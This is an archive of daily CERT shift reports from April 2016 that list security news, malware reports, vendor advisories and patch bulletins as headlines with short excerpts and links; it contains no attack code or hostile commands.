======================= = End-of-Shift report = ======================= Timeframe: Montag 25-04-2016 18:00 − Dienstag 26-04-2016 18:00 Handler: Robert Waldner Co-Handler: Stephan Richter *** "Fourth Sample of ICS Tailored Malware Uncovered and the Potential Impact" *** --------------------------------------------- I looked at the S4 Europe agenda which was sent out this morning by Dale Peterson and saw an interesting bullet: "Rob Caldwell of Mandiant will unveil some ICS malware in the wild that is doing some new and smarter things to attack ICS. We are working with Mandiant to provide a bit more info … Continue reading Fourth Sample of ICS Tailored Malware Uncovered and the Potential Impact... --------------------------------------------- http://ics.sans.org/blog/2016/04/25/fourth-sample-of-ics-tailored-malware-u… *** Juniper patches Logjam, Bar Mitzvah, and various Java vulns *** --------------------------------------------- In Junos Space, nobody can hear you patch | Juniper Networks sysadmins can add Junos Space network management patches to their to-do list. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2016/04/26/juniper_plu… *** Shopware update fixes RCE bug that affects both shop and target system *** --------------------------------------------- Shopware, an open-source shopping cart system chosen by a number of big European companies to power their online shops, has recently pushed out a critical security update. The update fixes a remote code execution bug that could allow attackers to read files on the target system, create new ones with malicious content, and run arbitrary code on the target system. This is a critical security vulnerability that not only affect the functions of the shop,... --------------------------------------------- https://www.helpnetsecurity.com/2016/04/26/shopware-update-fixes-rce-bug/ *** Sicherheits-Report: Unternehmen setzen selbst simple Schutzmechanismen nicht um *** --------------------------------------------- Forensische Analysen von mehr als 3000 nachweislichen Datenlecks zeigen, dass sich Angreifer wenig Neues einfallen lassen - weil Unternehmensnetze immer noch nicht gegen die ewig gleichen Angriffsmuster geschützt sind. --------------------------------------------- http://heise.de/-3184485 *** Breaking Steam Client Cryptography *** --------------------------------------------- So as to not bury the lede: Older versions of Steam allow an attacker who observes a client connecting to Steam to read sensitive information sent over the network. This allows the attacker to take over the account, bypass SteamGuard, and sometimes view plain-text passwords. But how? --------------------------------------------- https://steamdb.info/blog/breaking-steam-client-cryptography/ *** Malware and non-malware ways for ATM jackpotting. Extended cut *** --------------------------------------------- Millions of people around the world now use ATMs every day to withdraw cash, pay in to their account or make a variety of payments. Unfortunately, ATM manufacturers and their primary customers - banks - don't pay much attention to the security of cash machines. --------------------------------------------- http://securelist.com/analysis/publications/74533/malware-and-non-malware-w… *** Two Tips to Keep Your Phone's Encrypted Messages Encrypted *** --------------------------------------------- WhatsApp and Viber may have turned on "default" end-to-end encryption, but truly securing your messages requires a couple steps of your own. --------------------------------------------- http://www.wired.com/2016/04/tips-for-encrypted-messages/ *** Yeabests[.]cc: A fileless infection using WMI to hijack your Browser *** --------------------------------------------- Windows comes with a tool called the Windows Management Instrumentation, or WMI, that can be used by system administrators to receive information and notifications from Windows. ... Unfortunately, this [..] can also be used by malware developers for more nefarious reasons such as creating fileless infectors. --------------------------------------------- http://www.bleepingcomputer.com/news/security/yeabests-cc-a-fileless-infect… *** ENISA's Executive Director addresses EP ITRE Committee on key points for cybersecurity for the EU *** --------------------------------------------- Following the Commission announcement on the path to digitise the EU industry, ENISA participated at the ITRE meeting on 21st April in an exchange of views on cybersecurity in the EU, and ENISA's role in the implementation of the Digital Single Market. --------------------------------------------- https://www.enisa.europa.eu/news/enisa-news/enisa2019s-executive-director-a… *** SWIFT banking network warns customers of cyberfraud cases *** --------------------------------------------- SWIFT, the international banking transactions network, has warned customers of "a number" of recent incidents in which criminals sent fraudulent messages through its system.The warning from SWIFT (Society for Worldwide Interbank Financial Telecommunication) suggests that a February attack on the Bangladesh Bank, in which thieves got away with US $81 million, was not an isolated incident.SWIFT is aware of malware that "aims to reduce financial institutions' abilities"... --------------------------------------------- http://www.cio.com/article/3061685/swift-banking-network-warns-customers-of… *** New Decryptor Unlocks CryptXXX Ransomware *** --------------------------------------------- Researchers at Kaspersky Lab today published a decryptor that recovers files encrypted by the CryptXXX ransomware. --------------------------------------------- http://threatpost.com/new-decryptor-unlocks-cryptxxx-ransomware/117668/ *** AKW Gundremmingen: Infektion mit Uralt-Schadsoftware *** --------------------------------------------- Im Atomkraftwerk Gundremmingen wurde mindestens ein Rechner mit Schadsoftware infiziert. Bei genauerer Betrachtung scheint die Situation allerdings weniger dramatisch, als zuerst angenommen. --------------------------------------------- http://heise.de/-3188599 *** Rough Auditing Tool for Security (RATS) 2.3 - Crash PoC *** --------------------------------------------- Topic: Rough Auditing Tool for Security (RATS) 2.3 - Crash PoC Risk: Medium Text:# Exploit Title: RATS 2.3 Crash POC # Date: 25th April 2016 # Exploit Author: David Silveiro # Author Contact: twitter.com/d... --------------------------------------------- https://cxsecurity.com/issue/WLB-2016040155 *** Bugtraq: Trend Micro (Account) - Email Spoofing Web Vulnerability *** --------------------------------------------- http://www.securityfocus.com/archive/1/538197 *** Bugtraq: VoipNow v4.0.1 - (xajax_handler) Persistent Vulnerability *** --------------------------------------------- http://www.securityfocus.com/archive/1/538198 *** Bugtraq: Sophos XG Firewall (SF01V) - Persistent Web Vulnerability *** --------------------------------------------- http://www.securityfocus.com/archive/1/538199 *** TYPO3 CMS 6.2.22 and 7.6.6 released *** --------------------------------------------- The TYPO3 Community announces the versions 6.2.22 LTS and 7.6.6 LTS of the TYPO3 Enterprise Content Management System. We are announcing the release of the following TYPO3 CMS updates: TYPO3 CMS 6.2.22 LTS TYPO3 CMS 7.6.6 LTS All versions are maintenance releases and contain bug fixes only. --------------------------------------------- https://typo3.org/news/article/typo3-cms-6222-and-766-released/ *** Bugtraq: [security bulletin] HPSBGN03582 rev.1 - HPE Helion CloudSystem using glibc, Remote Code Execution, Denial of Service (DoS) *** --------------------------------------------- http://www.securityfocus.com/archive/1/538194 *** IBM Security Bulletin: IBM Vulnerability in BIND affects AIX (CVE-2015-8704) *** --------------------------------------------- http://www.ibm.com/support/ *** IBM Security Bulletin: IBM Vulnerability in OpenSSL affects AIX (CVE-2016-2842) *** --------------------------------------------- http://www.ibm.com/support/

1 0

Tageszusammenfassung - Montag 25-04-2016
by Daily end-of-shift report 25 Apr '16

25 Apr '16

======================= = End-of-Shift report = ======================= Timeframe: Freitag 22-04-2016 18:00 − Montag 25-04-2016 18:00 Handler: Robert Waldner Co-Handler: Stephan Richter *** Angler Exploit Kit, Bedep, and CryptXXX, (Sat, Apr 23rd) *** --------------------------------------------- Introduction On Friday 2016-04-15, Proofpoint researchers spotted CryptXXX [1], a new type of ransomware from the actors behind Reveton. CryptXXX is currently spread through Bedep infections sent by the Angler exploit kit (EK). So far, Ive only seen Bedep send CryptXXX after Angler EK traffic caused by the pseudo-Darkleech campaign." /> CryptXXX infections have their own distinct look." /> Bedep recently improved its evasion capabilities [3]. Its being sent by one of the most... --------------------------------------------- https://isc.sans.edu/diary.html?storyid=20981&rss *** Highlights from the 2016 HPE Annual Cyber Threat Report, (Mon, Apr 25th) *** --------------------------------------------- HP released their annual report for 2016 that covers a broad range of information (96 pages) in various sectors and industries. The report is divided in 7 themes, those that appear the most interesting to me are Theme #5: The industry didnt learn anything about patching in 2015 and Theme #7: The monetization of malware. Theme #5 According to this report, the bug that was the most exploited in 2014 was still the most exploited last year which is now over five years old. CVE-2010-2568 where a... --------------------------------------------- https://isc.sans.edu/diary.html?storyid=20985&rss *** Top 10 web hacking techniques of 2015 *** --------------------------------------------- Now in its tenth year, the Top 10 List of Web Hacking Techniques takes a step back from the implications of an attack to understand how they happen. The list is chosen by the security research community, coordinated by WhiteHat Security. After receiving 39 submissions detailing hacking techniques discovered in 2015, the following hacks were voted into the top 10 spaces: FREAK (Factoring Attack on RSA-Export Keys) LogJam Web Timing Attacks Made Practical Evading All... --------------------------------------------- https://www.helpnetsecurity.com/2016/04/25/top-10-web-hacking-techniques-20… *** Kritische Lücken: HP Data Protector verzichtet auf Authentifikation *** --------------------------------------------- Angreifer können den HP Data Protector über verschiedene Schwachstellen in den Mangel nehmen und Code auf Computer schieben. Sicherheits-Updates unterbinden das. --------------------------------------------- http://heise.de/-3183095 *** Snap: Ubuntus neue Pakete sind auf dem Desktop nicht sicherer *** --------------------------------------------- Die Ubuntu-Macher Canonical behaupten, mit dem neuen Paketformat Snap werden installierte Apps sicherer. Für Desktop-Anwender stimmt das allerdings nicht. --------------------------------------------- http://heise.de/-3183128 *** RDP Replay Code Release *** --------------------------------------------- We took a more in depth look to see what information could be extracted from a PCAP of this [RDP] activity, and this led to a tool being created to replay the RDP session as the attacker would have seen it. We have made this tool available after being asked by a number of our blog readers. This tool requires the private key for decrypting, which can usually be recovered with cooperation from the client. --------------------------------------------- http://www.contextis.com/resources/blog/rdp-replay-code-release/ *** Apple ID und iCloud: Gezieltes Phishing mit Textnachricht *** --------------------------------------------- Betrüger versuchen derzeit per SMS, Nutzer auf eine gefälschte Apple-ID-Anmeldeseite zu locken, um persönliche Daten in Erfahrung zu bringen. Die Mitteilung ist persönlich adressiert. --------------------------------------------- http://heise.de/-3183878 *** A Newer Variant of RawPOS in Depth *** --------------------------------------------- RawPOS - A History RawPOS (also sometimes referred to as Rdasrv from the original service install name) is a Windows based malware family that targets payment card data. It has been around at least since 2011, if not much earlier. Despite it being very well known and the functions it performs easy to understand, RawPOS continues to prove extremely effective in perpetuating long-term and devastating card breaches to this day. Similar to its cousin, BlackPOS, this malware targets industries... --------------------------------------------- https://www.alienvault.com/blogs/security-essentials/a-newer-variant-of-raw… *** Empty DDoS Threats: Meet the Armada Collective *** --------------------------------------------- [...] Our conclusion was a bit of a surprise: weve been unable to find a single incident where the current incarnation of the Armada Collective has actually launched a DDoS attack. In fact, because the extortion emails reuse Bitcoin addresses, theres no way the Armada Collective can tell who has paid and who has not. In spite of that, the cybercrooks have collected hundreds of thousands of dollars in extortion payments. [...] --------------------------------------------- https://blog.cloudflare.com/empty-ddos-threats-meet-the-armada-collective/ *** GozNym banking malware spotted now in Europe *** --------------------------------------------- IBMs X-Force reported today the actors behind the hybrid GozNym banking trojan that stole $4 million from U.S. banks in March have released a new configuration that is targeting European banks. --------------------------------------------- http://www.scmagazine.com/goznym-banking-malware-spotted-now-in-europe/arti… *** Angriff auf Zentralbank: Billigrouter und Malware führen zu Millionenverlust *** --------------------------------------------- Man sollte meinen, dass die Zentralbank eines Landes über eine Firewall verfügt. In Bangladesch war das offenbar nicht der Fall. So konnten Angreifer mit spezialisierter Malware fast 1 Milliarde US-Dollar überweisen - und scheiterten dann an einem Fehler. --------------------------------------------- http://www.golem.de/news/angriff-auf-zentralbank-billigrouter-und-malware-f… *** Manipulierte PNG-Datei schießt iOS- und Mac-Apps ab *** --------------------------------------------- Das Öffnen einer präparierten Bilddatei bringt Apps in iOS wie OS X zum Absturz, darunter den iOS-Homescreen. Die iMessage-App öffnet sich dadurch unter Umständen nicht mehr. --------------------------------------------- http://heise.de/-3184062 *** Exploit kit targets Android devices, delivers ransomware *** --------------------------------------------- Ransomware hitting mobile devices is not nearly as widespread as that which targets computers, but Blue Coat researchers have discovered something even less unusual: mobile ransomware delivered via exploit kit. The ransomware in question calls itself Cyber.Police (the researchers have dubbed it Dogspectus), and does not encrypt users' files, just blocks the infected Android device. It purports to be part of an action by the (nonexistent) "American national security agency"... --------------------------------------------- https://www.helpnetsecurity.com/2016/04/25/exploit-kit-targets-android-devi… *** VU#229047: Allround Automations PL/SQL Developer v11 performs updates over HTTP *** --------------------------------------------- Vulnerability Note VU#229047 Allround Automations PL/SQL Developer v11 performs updates over HTTP Original Release date: 25 Apr 2016 | Last revised: 25 Apr 2016 Overview Allround Automations PL/SQL Developer version 11 checks for updates over HTTP and does not verify updates before executing commands, which may allow an attacker to execute arbitrary code. Description CWE-345: Insufficient Verification of Data Authenticity - CVE-2016-2346 According to the researcher, Allround Automations... --------------------------------------------- http://www.kb.cert.org/vuls/id/229047 *** IBM Security Bulletins *** --------------------------------------------- *** IBM Security Bulletin: Vulnerabilities in git affect PowerKVM (CVE-2016-2315, CVE-2016-2324) *** http://www.ibm.com/support/docview.wss?uid=isg3T1023527 --------------------------------------------- *** IBM Security Bulletin: Vulnerabilities in NetworkManager affect PowerKVM (CVE-2015-0272,CVE-2015-2924) *** http://www.ibm.com/support/docview.wss?uid=isg3T1023498 --------------------------------------------- *** IBM Security Bulletin: A Security Vulnerability was fixed in IBM Security Privileged Identity Manager (CVE-2016-0357) *** http://www.ibm.com/support/docview.wss?uid=swg21981720 --------------------------------------------- *** IBM Security Bulletin: A vulnerability in libssh2 affects PowerKVM (CVE-2016-0787) *** http://www.ibm.com/support/docview.wss?uid=isg3T1023482 --------------------------------------------- *** IBM Security Bulletin: Vulnerabilities in ISC Bind affect PowerKVM (CVE-2016-1285, CVE-2016-1286) *** http://www.ibm.com/support/docview.wss?uid=isg3T1023483 --------------------------------------------- *** IBM Security Bulletin: A vulnerability in nss-util affects PowerKVM (CVE-2016-1950) *** http://www.ibm.com/support/docview.wss?uid=isg3T1023484 --------------------------------------------- *** IBM Security Bulletin: A vulnerability in strongSwan affects PowerKVM (CVE-2015-8023) *** http://www.ibm.com/support/docview.wss?uid=isg3T1023447 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in OpenSSL affects Sterling Connect:Enterprise for UNIX (CVE-2016-0800). *** http://www.ibm.com/support/docview.wss?uid=swg21980890 --------------------------------------------- *** IBM Security Bulletin: Information disclosure through unauthenticated SOAP request message. (CVE-2016-0299) *** http://www.ibm.com/support/docview.wss?uid=swg21981155 --------------------------------------------- *** IBM Security Bulletin: ClassLoader Manipulation with Apache Struts affecting IBM WebSphere Portal (CVE-2014-0114) *** http://www.ibm.com/support/docview.wss?uid=swg21680194 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in libssh2 affects SAN Volume Controller and Storwize Family (CVE-2015-1782) *** http://www.ibm.com/support/docview.wss?uid=ssg1S1005710 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in IBM Java Runtime affects IBM SAN Volume Controller and Storwize Family (CVE-2016-0475) *** http://www.ibm.com/support/docview.wss?uid=ssg1S1005709 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM WebSphere MQ (CVE-2016-0475, CVE-2015-7575, CVE-2016-0448) *** http://www.ibm.com/support/docview.wss?uid=swg21976896 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in Apache ActiveMQ affects IBM Control Center (CVE-2015-5254) *** http://www.ibm.com/support/docview.wss?uid=swg21981352 --------------------------------------------- *** IBM Security Bulletin: A vulnerability in IBM Java SDK affects IBM WebSphere MQ (CVE-2015-4872) *** http://www.ibm.com/support/docview.wss?uid=swg21981838 --------------------------------------------- *** IBM Security Bulletin: Security Bulletin: A vulnerability in OpenSSL affects the IBM FlashSystem model V840 (CVE-2015-3194) *** http://www.ibm.com/support/docview.wss?uid=ssg1S1005657 --------------------------------------------- *** IBM Security Bulletin: A vulnerability in OpenSSL affects the IBM FlashSystem models 840 and 900 (CVE-2015-3194) *** http://www.ibm.com/support/docview.wss?uid=ssg1S1005656 --------------------------------------------- *** IBM Security Bulletin: A vulnerability in OpenSSL affects the IBM FlashSystem model V840 (CVE-2015-3194) *** http://www.ibm.com/support/docview.wss?uid=ssg1S1005657 ---------------------------------------------

1 0

Tageszusammenfassung - Freitag 22-04-2016
by Daily end-of-shift report 22 Apr '16

22 Apr '16

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 21-04-2016 18:00 − Freitag 22-04-2016 18:00 Handler: Alexander Riepl Co-Handler: n/a *** Cisco Patches Denial-of-Service Flaws Across Three Products *** --------------------------------------------- Cisco released software updates to address five separate denial of service vulnerabilities, all which the company considers either high or critical severity, across its product line this week. --------------------------------------------- http://threatpost.com/cisco-patches-denial-of-service-flaws-across-three-pr… *** New version of TeslaCrypt ups ante for ransomware *** --------------------------------------------- Two updates in TeslaCrypt illustrate that ransomware is not only spreading wider, but is also evolving with new capabilities. --------------------------------------------- http://www.scmagazine.com/new-version-of-teslacrypt-ups-ante-for-ransomware… *** Cybercrime as a business rampant, new study *** --------------------------------------------- Attacks are getting fiercer and attackers more sophisticated and organized, according to the "2016 Trustwave Global Security Report," released this week. --------------------------------------------- http://www.scmagazine.com/cybercrime-as-a-business-rampant-new-study/articl… *** South Korea no 1 origin point for DDoS attacks *** --------------------------------------------- According to a new report by Imperva, South Korea serves as the most prolific point of origin for global DDoS attacks. --------------------------------------------- http://www.scmagazine.com/south-korea-no-1-origin-point-for-ddos-attacks/ar… *** SpyEye duo behind bank-account-emptying malware banged up *** --------------------------------------------- Billion-dollar Russian Trojan team in the tank for quarter of a century in the US A two-man team responsible for spreading the SpyEye malware that caused more than a billion dollars in financial hardship is now starting extended .. --------------------------------------------- www.theregister.co.uk/2016/04/21/us_jails_spyeye_malware_duo/ *** DSA-3554 xen - security update *** --------------------------------------------- Multiple vulnerabilities have been discovered in the Xen hypervisor. TheCommon Vulnerabilities and Exposures project identifies the followingproblems: --------------------------------------------- https://www.debian.org/security/2016/dsa-3554 *** Core Windows Utility Can Be Used to Bypass AppLocker *** --------------------------------------------- A researcher has discovered that Windows' Regsvr32 can be used to download and run JavaScript and VBScript remotely from the Internet, bypassing AppLocker's whitelisting protections. --------------------------------------------- http://threatpost.com/core-windows-utility-can-be-used-to-bypass-applocker/… *** TeslaCrypt: New versions and delivery methods, no decryption tool *** --------------------------------------------- TeslaCrypt ransomware was first spotted and analyzed in early 2015, and soon enough researchers created a decryption tool for it. The malware has since reached versions 4.0 and 4.1 but, unfortunately, there is currently no way to decrypt the .. --------------------------------------------- https://www.helpnetsecurity.com/2016/04/22/teslacrypt-new-versions-no-decry… *** Your credentials at risk with Lansweeper 5 *** --------------------------------------------- As a penetration testers, we rarely have to find 'zero day' vulnerabilities or perform 'bug hunting' in order to compromise Windows Active Directory Domains. However, in one of these rare cases while performing an internal penetration test for a client, we had to do so. Lansweeper is .. --------------------------------------------- http://blog.gosecure.ca/2016/04/21/your-credentials-at-risk-with-lansweeper… *** Red Hat Product Security Risk Report: 2015 *** --------------------------------------------- This report takes a look at the state of security risk for Red Hat products for calendar year 2015. We look at key metrics, specific vulnerabilities, and the most common ways users of Red Hat products were affected by security issues. --------------------------------------------- https://access.redhat.com/blogs/766093/posts/2262281 *** Hacking Nagios: The Importance of System Hardening *** --------------------------------------------- System hardening is important. Keeping systems in a hardened state is equally important. Good hardening should not only including keeping all the patches up-to-date, but also disabling all unnecessary services. The services that are necessary, must to be configured securely. All of this is .. --------------------------------------------- https://blog.anitian.com/hacking-nagios/ *** Hackerangriff: Drucker an deutschen Unis spuckten Nazi-Botschaften aus *** --------------------------------------------- Angriff auf vernetzte Kopierer und Drucker offenbar aus den USA - Sicherheitsleck behoben --------------------------------------------- http://derstandard.at/2000035504034 *** [2016-04-22] Insecure credential storage in my devolo Android app *** --------------------------------------------- The Android app of devolo Home Control suffers from insecure credential storage. Attackers can be able to recover sensitive information from stolen/lost devices. --------------------------------------------- https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2016… *** [2016-04-22] Multiple vulnerabilities in Digitalstrom Konfigurator *** --------------------------------------------- Multiple design and implementation flaws within the smart home system Digitalstrom enable an attacker to control arbitrary devices connected to the system and execute JavaScript code in the users browser. --------------------------------------------- https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2016… *** SEC Consult Study on Smart Home Security in Germany - a first silver lining on the horizon of IoT? *** --------------------------------------------- http://blog.sec-consult.com/2016/04/smart-home-security.html *** 1 Million Menschen nutzen Facebook über Tor *** --------------------------------------------- Lohnt es sich, einen eigenen Tor-Hidden-Service anzubieten? Facebook schreibt jetzt, dass die Zahl der aktiven Tor-Nutzer sich seit dem letzten Sommer verdoppelt hat. --------------------------------------------- http://www.golem.de/news/privatsphaere-1-million-menschen-nutzen-facebook-u… *** Snap: Ubuntus neues Paketformat ist unter X11 unsicher *** --------------------------------------------- Das neue Snap-Paketformat von Ubuntu soll nicht nur Installationen und Updates vereinfachen, sondern auch Anwendungen besser absichern. Unter X11 sei letzteres aber ein falsches Versprechen, sagt Sicherheitsforscher Matthew Garrett. überraschend ist das nicht. --------------------------------------------- http://www.golem.de/news/snap-ubuntus-neues-paketformat-ist-unter-x11-unsic… *** Why Hackers Love Your LinkedIn Profile *** --------------------------------------------- An employee opens an attachment from someone who claims to be a colleague in a different department. The attachment turns out to be malicious. The company network? Breached. If you follow the constant news about data breaches, you read this stuff all the .. --------------------------------------------- http://safeandsavvy.f-secure.com/2016/04/22/why-hackers-love-your-linkedin-… *** Nuclear Exploit-Kit bombardiert hunderttausende Rechner mit Locky *** --------------------------------------------- Ransomware wird im großen Stil über Exploit-Kits verteilt. Sicherheitsforschern ist es jetzt gelungen, ins Backend einer solchen Schadcode-Schleuder einzudringen und Statistiken über die Verbreitung der Trojaner zu sammeln. --------------------------------------------- http://heise.de/-3181696 *** JSA10727 - 2016-04 Security Bulletin: Junos Space: Multiple privilege escalation vulnerabilities in Junos Space (CVE-2016-1265) *** --------------------------------------------- http://kb.juniper.net/index?page=content&id=JSA10727

1 0

Tageszusammenfassung - Donnerstag 21-04-2016
by Daily end-of-shift report 21 Apr '16

21 Apr '16

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 20-04-2016 18:00 − Donnerstag 21-04-2016 18:00 Handler: Stephan Richter Co-Handler: n/a *** Angebliche Paket-Verständigung von der "Post" kann Ihre Daten durch Verschlüsselung unbrauchbar machen *** --------------------------------------------- Modus Operandi Kaum ist die Bedrohung durch angebliche E-Mails von DHL im Abklingen, erreicht uns eine neue Welle von E-Mails mit gefährlichem Inhalt. Nunmehr gibt die Mail vor von der "Post" zu stammen und informiert über eine nicht erfolgreich durchgeführte Zustellung. Die weitere Vorgehensweise bleibt dabei gleich; der Empfänger wird aufgefordert den Versandschein über einen Link in der Mail herunter zu laden. --------------------------------------------- http://www.bmi.gv.at/cms/BK/betrug/files/Cryptolocker_Ransomware_Post.pdf *** Decoding Pseudo-Darkleech (#1), (Thu, Apr 21st) *** --------------------------------------------- Im currently going through a phase of WordPress dPression. Either my users are exceptionally adept at finding hacked and subverted WordPress sites, or there are just so many of these sites out there. This weeks particular fun seems to be happening on restaurant web sites. Inevitably, when checking out the origin of some crud, I discover a dPressing installation that shows signs of being owned since months. The subverted sites currently lead to Angler Exploit Kit (Angler EK), and are using... --------------------------------------------- https://isc.sans.edu/diary.html?storyid=20969&rss *** SpyEye botnet kit developer sentenced to long jail term *** --------------------------------------------- Aleksandr Andreevich Panin, the Russian developer of the SpyEye botnet creation kit, and an associate were on Wednesday sentenced to prison terms by a court in Atlanta, Georgia, for their role in developing and distributing malware that is said to have caused millions of dollars in losses to the financial sector.Panin, who set out to develop SpyEye as a successor to the Zeus malware that affected financial institutions since 2009, was sentenced by the court to nine and half years in prison,... --------------------------------------------- http://www.cio.com/article/3059554/spyeye-botnet-kit-developer-sentenced-to… *** Looking Into a Cyber-Attack Facilitator in the Netherlands *** --------------------------------------------- A small webhosting provider with servers in the Netherlands and Romania has been a hotbed of targeted attacks and advanced persistent threats (APT) since early 2015. Starting from May 2015 till today we counted over 100 serious APT incidents that originated from servers of this small provider. Pawn Storm used the servers for at least 80 high profile attacks against various governments in the US, Europe, Asia, and the Middle East. Formally the Virtual Private Server (VPS) hosting company is... --------------------------------------------- http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/MKFUpCeHi9s/ *** FBI warns farming industry about equipment hacks, data breaches *** --------------------------------------------- As Internet-connected equipment is increasingly used in many industry sectors, alerts like the latest one issued by the FBI to US farmers will likely become a regular occurrence. While precision agriculture technology (a.k.a. smart farming) reduces farming costs and increases crop yields, farmers need to be aware of and understand the associated cyber risks to their data and ensure that companies entrusted to manage their data, including digital management tool and application developers... --------------------------------------------- https://www.helpnetsecurity.com/2016/04/21/farming-cyber-risks/ *** Lab - Cryptographic Algorithms *** --------------------------------------------- For this lab we'll be using GPG, OpenSSL to demonstrate symmetric and asymmetric encryption/decryption and MD5, SHA1 to demonstrate hash functions. Virtual Machine Needed: Kali Before starting the lab here are some definitions: In all symmetric crypto algorithms (also called Secret Key encryption) a secret key is used for both encrypt plaintext and decrypt the... --------------------------------------------- http://resources.infosecinstitute.com/lab-cryptographic-algorithms/ *** Fremdenfeindliche Ausdrucke: "Hackerangriff" auf Universitätsdrucker *** --------------------------------------------- Hackerangriff oder doch nur eine falsche Druckerkonfiguration: In verschiedenen Universitäten in Deutschland sind in den Druckern Dokumente mit fremdenfeindlichem Hintergrund gefunden worden. --------------------------------------------- http://www.golem.de/news/fremdenfeindliche-ausdrucke-hackerangriff-auf-univ… *** Security update available for the Adobe Analytics AppMeasurement for Flash Library *** --------------------------------------------- A Security Bulletin (APSB16-13) has been published regarding a security update for the Adobe Analytics AppMeasurement for Flash Library. This update resolves an important vulnerability in the AppMeasurement for Flash library that could be abused to conduct DOM-based cross-site scripting attacks... --------------------------------------------- https://blogs.adobe.com/psirt/?p=1341 *** DFN-CERT-2016-0655: Squid: Mehrere Schwachstellen ermöglichen u.a. die Ausführung beliebigen Programmcodes *** --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2016-0655/ *** [R2] Nessus < 6.6 Fixes Two Vulnerabilities *** --------------------------------------------- http://www.tenable.com/security/tns-2016-08 *** Moxa NPort Device Vulnerabilities (Update A) *** --------------------------------------------- This alert update is a follow-up to the original NCCIC/ICS-CERT Alert titled ICS-ALERT-16-099-01 Moxa NPort Device Vulnerabilities that was published April 8, 2016, on the ICS-CERT web page. ICS-CERT is aware of a public report of vulnerabilities affecting multiple models of the Moxa NPort device. ICS-CERT has notified Moxa of the report, and Moxa has validated all five of the reported vulnerabilities. --------------------------------------------- https://ics-cert.us-cert.gov/alerts/ICS-ALERT-16-099-01 *** Hyper-V - vmswitch.sys VmsMpCommonPvtHandleMulticastOids Guest to Host Kernel-Pool Overflow *** --------------------------------------------- Topic: Hyper-V - vmswitch.sys VmsMpCommonPvtHandleMulticastOids Guest to Host Kernel-Pool Overflow Risk: High Text:/* This function is reachable by sending a RNDIS Set request with OID 0x01010209 (OID_802_3_MULTICAST_LIST) from the Guest to... --------------------------------------------- https://cxsecurity.com/issue/WLB-2016040133 *** Avast SandBox Escape via IOCTL Requests *** --------------------------------------------- Topic: Avast SandBox Escape via IOCTL Requests Risk: Medium Text:* CVE: CVE-2016-4025 * Vendor: Avast * Reported by: Kyriakos Economou * Date of Release: 19/04/2016 * Affected Products: Mu... --------------------------------------------- https://cxsecurity.com/issue/WLB-2016040134 *** Cisco Security Advisories *** --------------------------------------------- *** Cisco Wireless LAN Controller Management Interface Denial of Service Vulnerability *** http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… --------------------------------------------- *** Cisco Wireless LAN Controller Denial of Service Vulnerability *** http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… --------------------------------------------- *** Cisco Adaptive Security Appliance Software DHCPv6 Relay Denial of Service Vulnerability *** http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… --------------------------------------------- *** Cisco Wireless LAN Controller HTTP Parsing Denial of Service Vulnerability *** http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… --------------------------------------------- *** Multiple Cisco Products libSRTP Denial of Service Vulnerability *** http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… --------------------------------------------- *** IBM Security Bulletins *** --------------------------------------------- *** IBM Security Bulletin: A vulnerability in OpenSSL affects IBM Tivoli Netcool System Service Monitors/Application Service Monitors (CVE-2016-0800) *** http://www.ibm.com/support/docview.wss?uid=swg21980721 --------------------------------------------- *** IBM Security Bulletin: A vulnerability in libcURL affects IBM Tivoli Netcool System Service Monitors/Application Service Monitors (CVE-2015-3237) *** http://www.ibm.com/support/docview.wss?uid=swg21980719 --------------------------------------------- *** IBM Security Bulletin: Vulnerabilities in OpenSSL affects IBM Tivoli Netcool System Service Monitors/Application Service Monitors (CVE-2015-3197, CVE-2015-4000) *** http://www.ibm.com/support/docview.wss?uid=swg21980716 --------------------------------------------- *** IBM Security Bulletin: Vulnerabilities in OpenSSL affects IBM Tivoli Netcool System Service Monitors/Application Service Monitors (CVE-2015-3194, CVE-2015-3195, CVE-2015-3196) *** http://www.ibm.com/support/docview.wss?uid=swg21980714 --------------------------------------------- *** IBM Security Bulletin: Current Releases of IBM® SDK for Node.js™ are affected by CVE-2015-8851 *** http://www.ibm.com/support/docview.wss?uid=swg21981528 --------------------------------------------- *** IBM Security Bulletin: IBM Spectrum Scale, with the Spectrum Scale GUI installed, is affected by a security vulnerability (CVE-2016-0361) *** http://www.ibm.com/support/docview.wss?uid=ssg1S1005742 --------------------------------------------- *** Drupal Security Advisories for Third-Party Modules *** --------------------------------------------- *** EPSA Crop - Image Cropping - Critical -XSS - SA-CONTRIB-2016-024 - Unsupported *** https://www.drupal.org/node/2710247 --------------------------------------------- *** Organic groups - Moderately Critical - Access bypass - DRUPAL-SA-CONTRIB-2016-023 *** https://www.drupal.org/node/2710115 --------------------------------------------- *** Search API - Moderately Critical - Multiple Vulnerabilities - SA-CONTRIB-2016-022 *** https://www.drupal.org/node/2710063 ---------------------------------------------

1 0

Tageszusammenfassung - Mittwoch 20-04-2016
by Daily end-of-shift report 20 Apr '16

20 Apr '16

